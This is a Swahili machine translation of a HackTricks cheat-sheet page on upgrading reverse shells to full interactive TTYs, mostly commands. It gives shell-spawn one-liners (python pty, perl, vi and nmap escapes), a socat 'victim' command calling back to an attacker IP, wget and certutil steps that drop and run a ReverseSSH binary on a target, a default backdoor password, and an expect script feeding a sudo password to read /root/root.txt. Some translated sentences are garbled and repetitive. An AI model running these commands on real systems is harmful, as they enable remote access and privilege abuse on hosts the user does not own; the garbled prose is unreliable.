Full TTYs

Jifunze na zoezi la AWS Hacking:Mafunzo ya HackTricks ya Mtaalam wa Timu Nyekundu ya AWS (ARTE) Jifunze na zoezi la GCP Hacking: Mafunzo ya HackTricks ya Mtaalam wa Timu Nyekundu ya GCP (GRTE)

Support HackTricks

Angalia mpango wa michango!
Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram au tufuate kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud github repos.

TTY Kamili

Tafadhali kumbuka kwamba kaboti ulioweka katika SHELL lazima uwe umetajwa ndani ya /etc/shells au Thamani ya kaboti ya SHELL haikupatikana katika faili ya /etc/shells Tukio hili limepelekwa. Pia, kumbuka kwamba vipande vya msimbo vifuatavyo vinaweza kufanya kazi tu katika bash. Ikiwa uko katika zsh, badilisha kwa bash kabla ya kupata kaboti kwa kufanya bash.

Python

python3 -c 'import pty; pty.spawn("/bin/bash")'

(inside the nc session) CTRL+Z;stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset;

Unaweza kupata idadi ya safu na vibambo kwa kutekeleza stty -a

script

script /dev/null -qc /bin/bash #/dev/null is to not store anything
(inside the nc session) CTRL+Z;stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset;

socat

#Listener:
socat file:`tty`,raw,echo=0 tcp-listen:4444

#Victim:
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444

Kuzaliana vikochi

python -c 'import pty; pty.spawn("/bin/sh")'
echo os.system('/bin/bash')
/bin/sh -i
script -qc /bin/bash /dev/null
perl -e 'exec "/bin/sh";'
perl: exec "/bin/sh";
ruby: exec "/bin/sh"
lua: os.execute('/bin/sh')
IRB: exec "/bin/sh"
vi: :!bash
vi: :set shell=/bin/bash:shell
nmap: !sh

ReverseSSH

Njia rahisi ya kupata upatikanaji wa kikochi cha mwingiliano, pamoja na uhamishaji wa faili na mbelezo ya bandari, ni kuweka seva ya ssh iliyolinkishwa kwa njia ya static ReverseSSH kwenye lengo.

Hapa chini ni mfano kwa x86 na programu za upx-compressed. Kwa programu nyingine, angalia ukurasa wa kutolewa.

Jipange kwa ajili ya kupokea ombi la mbelezo la bandari ya ssh kwa kifaa chako:

# Drop it via your preferred way, e.g.
wget -q https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_reverse-sshx86 -O /dev/shm/reverse-ssh && chmod +x /dev/shm/reverse-ssh

/dev/shm/reverse-ssh -v -l -p 4444

(2a) Lengo la Linux:

# Drop it via your preferred way, e.g.
wget -q https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_reverse-sshx86 -O /dev/shm/reverse-ssh && chmod +x /dev/shm/reverse-ssh

/dev/shm/reverse-ssh -p 4444 kali@10.0.0.2

(2b) Lengo la Windows 10 (kwa toleo za awali, angalia soma maelezo ya mradi):

# Drop it via your preferred way, e.g.
certutil.exe -f -urlcache https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_reverse-sshx86.exe reverse-ssh.exe

reverse-ssh.exe -p 4444 kali@10.0.0.2

Ikiwa ombi la mbele la mbele la mbele la mbele lilifanikiwa, sasa unapaswa kuweza kuingia kwa nywila ya msingi letmeinbrudipls katika muktadha wa mtumiaji anayekimbia reverse-ssh(.exe):

# Interactive shell access
ssh -p 8888 127.0.0.1

# Bidirectional file transfer
sftp -P 8888 127.0.0.1

Hakuna TTY

Ikiwa kwa sababu fulani huwezi kupata TTY kamili unaweza bado kuingiliana na programu ambazo zinatarajia mwingiliano wa mtumiaji. Katika mfano ufuatao, nenosiri linapitishwa kwa sudo ili kusoma faili:

expect -c 'spawn sudo -S cat "/root/root.txt";expect "*password*";send "<THE_PASSWORD_OF_THE_USER>";send "\r\n";interact'

Jifunze na zoea AWS Hacking:Mafunzo ya HackTricks AWS Timu Nyekundu Mtaalam (ARTE) Jifunze na zoea GCP Hacking: Mafunzo ya HackTricks GCP Timu Nyekundu Mtaalam (GRTE)

Support HackTricks

Angalia mpango wa michango!
Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram au tufuate kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud github repos.

PreviousShells - Linux NextChecklist - Linux Privilege Escalation

Last updated 8 days ago